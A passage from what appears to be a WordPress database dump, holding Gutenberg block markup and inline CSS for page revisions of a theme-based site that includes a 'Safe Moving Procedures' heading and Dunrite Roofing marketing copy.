.skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-dc07bcbb-e525-4314-b589-15be45dc4e59 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"blockId\":\"d6b07e0e-145d-4fcf-b0ab-81e1597b2431\"} -->\n<style type=\"text/css\"> .block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"a76f9b72-1972-4fc1-9508-94e879ce8fe8\",\"showHeading\":false,\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"separatorSpacingTablet\":35,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":17,\"headingTitleFontSizeMobile\":0,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-title-text {\n font-size: 17px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-seperator {\n margin-bottom: 35px !important; }\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-title-text {\n font-size: 0px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-a76f9b72-1972-4fc1-9508-94e879ce8fe8\"><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Our Safe Moving<br>Procedures</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":30,\"blockId\":\"ee5678bf-92ed-4865-aa79-230e1108a2f5\"} -->\n<style type=\"text/css\"> .block-ee5678bf-92ed-4865-aa79-230e1108a2f5 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-ee5678bf-92ed-4865-aa79-230e1108a2f5 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-ee5678bf-92ed-4865-aa79-230e1108a2f5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-ee5678bf-92ed-4865-aa79-230e1108a2f5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-ee5678bf-92ed-4865-aa79-230e1108a2f5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-ee5678bf-92ed-4865-aa79-230e1108a2f5\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"View All\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/blog-full-width/\",\"counterId\":\"a5cb6a55-72ca-447b-9d80-e0be7d2f2b89\",\"hPadding\":25,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 25px; padding-right: 25px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/blog-full-width/\" rel=\"noopener noreferrer\" target=\"_blank\">View All</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/skt-blocks-post-grid {\"postsToShow\":2,\"displayPostExcerpt\":false,\"displayPostAuthor\":false,\"postTitleTag\":\"h5\",\"readMoreText\":\"Read More\",\"bgColor\":\"#ffffff\",\"imageBorderRadius\":0,\"metaColor\":\"#6a6a6a\",\"readMoreLinkColor\":\"#fc8134\",\"titleColor\":\"#282828\",\"titleHoverColor\":\"#0d2e63\",\"contentPadding\":0,\"continueFontSize\":16,\"continueFontWeight\":\"600\",\"titleFontSize\":24,\"titleLineHeight\":1.2,\"titleFontWeight\":\"400\",\"metaFontSize\":16,\"metaFontWeight\":\"400\",\"metaTextTransform\":\"capitalize\",\"titleFontFamily\":\"Poppins\",\"metaFontFamily\":\"Poppins\",\"rowGap\":0,\"postGridBlockId\":\"eca83834\"} /--></div></section></div>\n<!-- /wp:skt-blocks/section -->','Home','','inherit','closed','closed','','336-revision-v1','','','2022-08-24 23:20:48','2022-08-24 23:20:48','',336,'https://cteisys.com/?p=487',0,'revision','',0),(497,1,'2022-08-25 00:03:38','2022-08-25 00:03:38','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"9442ca66-a156-4eca-bc76-a1ce7a02d56a\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-9442ca66-a156-4eca-bc76-a1ce7a02d56a background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-9442ca66-a156-4eca-bc76-a1ce7a02d56a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"d8f9dcbd-15b0-408f-ac6e-562c2306ed02\"} -->\n<style type=\"text/css\"> .block-d8f9dcbd-15b0-408f-ac6e-562c2306ed02 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-d8f9dcbd-15b0-408f-ac6e-562c2306ed02 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-d8f9dcbd-15b0-408f-ac6e-562c2306ed02 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-d8f9dcbd-15b0-408f-ac6e-562c2306ed02 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-d8f9dcbd-15b0-408f-ac6e-562c2306ed02 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-d8f9dcbd-15b0-408f-ac6e-562c2306ed02 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d8f9dcbd-15b0-408f-ac6e-562c2306ed02 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-d8f9dcbd-15b0-408f-ac6e-562c2306ed02 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"5bb0eb53-4142-4c56-a9da-ddac15427577\"} -->\n<style type=\"text/css\"> .block-5bb0eb53-4142-4c56-a9da-ddac15427577 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-5bb0eb53-4142-4c56-a9da-ddac15427577 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-5bb0eb53-4142-4c56-a9da-ddac15427577 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-5bb0eb53-4142-4c56-a9da-ddac15427577 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-5bb0eb53-4142-4c56-a9da-ddac15427577 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-5bb0eb53-4142-4c56-a9da-ddac15427577\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"3bac4046-8d50-4568-a704-3d0a1309220e\"} -->\n<style type=\"text/css\"> .block-3bac4046-8d50-4568-a704-3d0a1309220e .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-3bac4046-8d50-4568-a704-3d0a1309220e .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-3bac4046-8d50-4568-a704-3d0a1309220e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-3bac4046-8d50-4568-a704-3d0a1309220e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-3bac4046-8d50-4568-a704-3d0a1309220e .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-3bac4046-8d50-4568-a704-3d0a1309220e\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:heading {\"level\":3} -->\n<h3>EXPERIENCE THE DUNRITE DIFFERENCE</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Dunrite Roofing has been working hard for three generations to provide you our ultimate goal:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>100% customer satisfaction. Locally owned and operated for 25+ years, contact us today for a free estimate and see why so many of your neighbors and friends refer Dunrite.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"1e15d182-2fe0-4c40-80ac-07eac231b55f\"} -->\n<style type=\"text/css\"> .block-1e15d182-2fe0-4c40-80ac-07eac231b55f .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-1e15d182-2fe0-4c40-80ac-07eac231b55f .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-1e15d182-2fe0-4c40-80ac-07eac231b55f .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-1e15d182-2fe0-4c40-80ac-07eac231b55f .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-1e15d182-2fe0-4c40-80ac-07eac231b55f .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-1e15d182-2fe0-4c40-80ac-07eac231b55f .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-1e15d182-2fe0-4c40-80ac-07eac231b55f .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-1e15d182-2fe0-4c40-80ac-07eac231b55f skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" 